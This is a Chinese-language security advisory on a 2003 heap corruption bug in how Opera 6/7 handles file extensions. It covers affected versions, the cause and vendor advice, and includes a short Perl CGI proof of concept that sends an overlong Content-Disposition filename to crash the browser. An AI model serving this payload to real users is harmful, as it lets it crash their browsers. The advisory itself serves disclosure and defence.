安全研究

安全漏洞
Opera 6/7文件扩展名远程堆破坏漏洞

发布日期:2003-04-28
更新日期:2003-05-08

受影响系统:
Opera Software Opera Web Browser 7.10
Opera Software Opera Web Browser 7.03 win32
Opera Software Opera Web Browser 7.02 win32
Opera Software Opera Web Browser 7.01 win32
Opera Software Opera Web Browser 7.0 win32
Opera Software Opera Web Browser 6.0.5 win32
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.2 win32
Opera Software Opera Web Browser 6.0 win32
Opera Software Opera Web Browser 6.0.1 win32
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 7450

Opera是一款多平台的WEB浏览器。

Opera没有正确检查文件扩展名长度,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发堆破坏,造成拒绝服务。

Opera以宽字符编码方式把文件名写入到堆缓冲区中,在写入过程中,Opera没有检查扩展名长度,就写入数据到缓冲区边界上,可导致指针覆盖,和管理堆的结构破坏(被类似"XX00XX00"任意数据写入),使Opera崩溃终止。

根据作者分析此漏洞不能用于执行任意指令。

<*来源:nesumin (nesumin@softhome.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105154501027383&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

nesumin (nesumin@softhome.net)提供了如下测试方法:

---------------------------------------------------------------
#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";
---------------------------------------------------------------

建议:
厂商补丁:

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.opera.com

浏览次数:3383
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障